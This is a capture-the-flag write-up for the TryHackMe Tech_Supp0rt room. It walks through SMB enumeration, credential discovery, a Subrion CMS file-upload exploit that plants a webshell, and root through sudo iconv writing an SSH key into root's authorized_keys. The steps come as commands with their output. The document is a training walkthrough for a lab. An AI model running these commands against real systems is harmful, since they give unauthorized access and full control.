TryHackMe Tech_Supp0rt: 1 Writeup
Hey my friends i’m Medhat Fathy and This my write-up for ech_Supp0rt: 1 Room
Description : Hack into the scammer’s under-development website to foil their plans.
Reconnaissance
0xmedhat@kali:/$ sudo nmap -sS -sV 10.10.138.144
[sudo] password for 0xmedhat:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-15 17:23 EDT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.05% done; ETC: 17:23 (0:00:01 remaining)
Nmap scan report for 10.10.138.144 (10.10.138.144)
Host is up (0.26s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.27 seconds
We have 4 ports open.
- port 22: ssh
- port 80 : http Apache
- port 139 netbios
- port 445: netbios
let’s using smbmap to list smb shares
0xmedhat@kali:/$ smbmap -H 10.10.138.144
[+] Guest session IP: 10.10.138.144:445 Name: 10.10.138.144
Disk Permissions Comment
— — — — — — — — — — — -
print$ NO ACCESS Printer Drivers
websvr READ ONLY
IPC$ NO ACCESS IPC Service (TechSupport server (Samba, Ubuntu))
let’s Reading the content of websvr by using smbclient:
0xmedhat@kali:/$ smbclient \\\\10.10.138.144\\websvr
Enter WORKGROUP\kali’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 03:17:38 2021
.. D 0 Sat May 29 03:03:47 2021
enter.txt N 273 Sat May 29 03:17:38 20218460484 blocks of size 1024. 5700016 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> ^C0xmedhat@kali:/$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn’t work, edit from panel
3)Edit wordpress websiteIMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
we got a credential
let’s encrypted It with https://gchq.github.io/CyberChef/
So now we got a credintial username “admin” and the password “****2021”
— — — — — — — — — — — — — — — — — — -
then i going to the ip but it was useless
then i using gobuster i found that path /subrion/panel
logged in using user & pass
I searched about exploit it , i found many ways but I use that
https://packetstormsecurity.com/files/162591/Subrion-CMS-4.2.1-Shell-Upload.html
download the code and change the permission using chmod +x
0xmedhat@kali:/$ python3 exploit.py -u http://10.10.138.144/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 — File Upload Bypass to RCE — CVE-2018–19422[+] Trying to connect to: http://10.10.138.144/subrion/panel/
[+] Success!
[+] Got CSRF token: n75r3m1vigDfgSjN3lOwPIGXYwD0cnP69Nzha6WX
[+] Trying to log in…
[+] Login Successful![+] Generating random name for Webshell…
[+] Generated webshell name: dtkjwpwuxutpueh[+] Trying to Upload Webshell..
[+] Upload Success… Webshell path: http://10.10.138.144/subrion/panel/uploads/dtkjwpwuxutpueh.phar$ ls
dtkjwpwuxutpueh.phar
then I created a bash reverse shell and i used linpeas and i found db_user and db_pass
DB_USER = “support”
DB_PASS = “***ScammerLOL!123!”
I used the password to connect with scamsite who is the only user on the machine , and it works!!
let’s esclate our privillege
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
scamsite@TechSupport:~$
let’s going to GTFObins
we can genrate a key use ssh-keygen
0xmedhat@kali:/$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/0xmedhat/.ssh/id_rsa): /home/0xmedhat/THm/must/id_rsa/id_rsa
/home/0xmedhat/THm/must/id_rsa/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/THm/must/id_rsa/id_rsa
Your public key has been saved in /home/kali/THm/must/id_rsa/id_rsa.pub
The key fingerprint is:
SHA256:3FyR+9iqZ38LjuMnylcsAFj8pvH+BFZxF+UGoq/obgQ kali@kali
The key’s randomart image is:
+ — -[RSA 3072] — — +
| +. .oo.o+|
| . o .+o.o |
| o …. o|
| Eo *.o. . |
| .So+ o+ |
| .oo.o.oo |
| .o ..oo |
| .o..+*.. .|
| ooo*B+o.o.|
+ — — [SHA256] — — -+scamsite@TechSupport:/home$ LFILE=/root/.ssh/authorized_keys
scamsite@TechSupport:/home$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDkEcRYHFyQEO3L1gOzssIU3DB1g0ZYyi1762rgRZZiWQT1kbEzZmDH7/kxys1XTWjQYCaEbXPLWZhX867eo1WihZv/qxStpR5jZ/XZNT26Axdi7X0Y5nvdTh9sZ+PHsgceQiPB/mSAJs1KwOhVCLMnwwQFxWoHINGUnQLSYm66I4SorQzxSCRnHoq0FWaw6hi0fLCzZUr0VZ5w4K0Q8pZuPNERGvKLzOizaZ9DZNqHfJHxu4TaaJjBmfSPRv9kE8Hn7pCfqipMoGCfhTidm2VA1SXp0qkuDA8AEe60/Gb1wiFdOihEd21sYR6Gwr4zv44eRCD5gE1TH3u0nINM+jPyx+G0ULQlg00jHIfFEdI1wPSOohE9iUla/f9nDBC5Lm90ad/4lKU6snNPyaSRf9VdPBpFpbdot2shIzJHPpxofCB6MPYFIRICOAXMI1HE0I/A9m5Z5277ex2miy2D1aqlWGXlCmATKUDB7UO6ToXuMKPmTeX+U1Eh0dQ2E/+KNk= 0xmedhat@kali” | sudo iconv -f 8859_1 -t 8859_1 -o “$LFILE”
let’s connect with root and id_rsa we generated
it works
root@TechSupport: cat root.txt
851b8233a8c0*********1bd1529bf1ed02790b
another way by using file read !
we know the path to root.txt
scamsite@TechSupport:/home$ LFILE=/root/root.txt
scamsite@TechSupport:/home$ sudo iconv -f 8859_1 -t 8859_1 “$LFILE”
851b8233a8c**********1bd1529bf1ed02790b -
it’s easy “)
Thanks 🥰